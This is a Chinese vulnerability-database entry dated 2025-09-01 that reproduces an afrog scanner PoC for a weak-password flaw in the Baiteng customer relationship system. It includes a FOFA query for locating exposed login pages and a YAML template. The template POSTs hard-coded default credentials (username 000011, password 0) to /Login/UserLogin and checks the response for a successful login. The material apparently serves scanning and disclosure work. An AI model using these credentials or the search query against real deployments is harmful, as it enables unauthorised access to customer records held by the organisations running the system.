baiteng-customer-relationship-system-weak-password: 百腾客户关系系统弱口令

日期: 2025-09-01 | 影响软件: baiteng customer relationship system | POC: 已公开

漏洞描述

百腾客户关系系统弱口令 fofa: body="百腾客户系统-登录"

PoC代码[已公开]

id: baiteng-customer-relationship-system-weak-password

info:
  name: 百腾客户关系系统弱口令
  author: daffainfo
  severity: high
  verified: false
  description: |
    百腾客户关系系统弱口令
    fofa: body="百腾客户系统-登录"

set:
  hosturl: request.url
rules:
  r0:
    request:
      method: POST
      path: /Login/UserLogin
      headers:
        Origin: "{{hosturl}}"
        Referer: "{{hosturl}}"
        X-Requested-With: XMLHttpRequest
      body: |
        username=000011&password=0&referer=%24%7Bparam.referer%7D&mac=88%3A51%3AFB%3A47%3A08%3A75
    expression: response.status == 200 && response.body.bcontains(b'"status":200') && response.body.bcontains(b'"url":') && response.body.bcontains(b'"msg":') && response.headers["content-type"].contains("application/json")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/baiteng-customer-relationship-system-weak-password.yaml

相关漏洞推荐